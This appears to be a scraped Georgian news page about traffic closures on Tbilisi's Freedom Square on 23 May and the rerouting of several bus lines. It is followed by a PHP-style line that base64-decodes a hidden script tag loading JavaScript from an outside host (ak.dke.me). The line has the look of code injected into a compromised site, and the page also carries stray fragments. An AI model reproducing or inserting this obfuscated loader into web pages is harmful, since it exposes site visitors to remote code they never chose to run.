celsiusi
ავერსი საქკაბელი

26 მაისისადმი მიძღვნილი ღონისძიების მოსამზადებელი სამუშაოების გამო 23 მაისის 20:00 საათიდან 23:00 საათამდე თავისუფლების მოედანზე ტრანსპორტის მოძრაობა სრულად შეიზღუდება.

 

დედაქალაქის მერიის ინფორმაციით, კოტე აფხაზისა და შალვა დადიანის ქუჩებიდან თავისუფლების მოედანზე ტრანსპორტის გადაადგილება აიკრძალება.

„მტკვრის მარჯვენა და მარცხენა სანაპიროდან თავისუფლების მოედნისკენ მოძრავი ავტომობილებისთვის გადაადგილება შესაძლებელი იქნება ბარათაშვილის ხიდთან მდებარე პანდუსამდე, კერძოდ, ალექსანდრე პუშკინის ქუჩის დასაწყისამდე. ნიკოლოზ ბარათაშვილის ქუჩიდან შოთა რუსთაველის გამზირის მიმართულებით მოძრაობა შესაძლებელი იქნება თაბუკაშვილის ქუჩის გავლით. შოთა რუსთაველის გამზირზე მოძრაობა შესაძლებელი იქნება სავაჭრო ცენტრ „გალერიამდე“ და უკუმიმართულებით. N350, N371 და N344 ავტობუსები და N547 მიკროავტობუსი, კოტე აფხაზის ქუჩის ნაცვლად, იმოძრავებენ გორგასლის ქუჩიდან ევროპის მოედნის მიმართულებით, შემდეგ, მარცხენა სანაპიროსა და ბარათაშვილის ხიდის გავლით, დაუკავშირდებიან ბარათაშვილის ქუჩას. საზოგადოებრივი ტრანსპორტის ის ნაწილი, რომელიც მელიქიშვილის გამზირიდან ბარათაშვილის ქუჩისკენ მოძრაობს, გადაადგილებას შეძლებს მეტროსადგურ „თავისუფლების მოედნამდე“, რის შემდეგ მობრუნდება სავაჭრო ცენტრ „გალერიასთან“ და ბარათაშვილის ქუჩას გიორგი ჭანტურიასა და სოლიკო ვირსალაძისა სახელობის ქუჩების და მარჯვენა სანაპიროს გამოყენებით დაუკავშირდება, შემდეგ კი გზას დადგენილი სქემის მიხედვით გააგრძელებს“, – აღნიშნულია მერიის ინფორმაციაში.

344
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");